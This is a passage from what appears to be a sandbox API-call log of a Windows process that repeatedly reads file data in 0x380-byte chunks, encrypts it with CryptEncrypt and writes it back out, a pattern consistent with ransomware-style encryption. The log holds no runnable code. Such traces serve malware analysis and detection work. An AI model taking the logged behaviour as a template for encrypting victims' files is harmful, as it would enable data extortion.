lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.747] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.747] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.748] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.748] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.749] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.749] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.750] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.750] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.751] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.751] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.752] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.752] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.753] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.753] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.754] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.754] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.755] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.755] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) 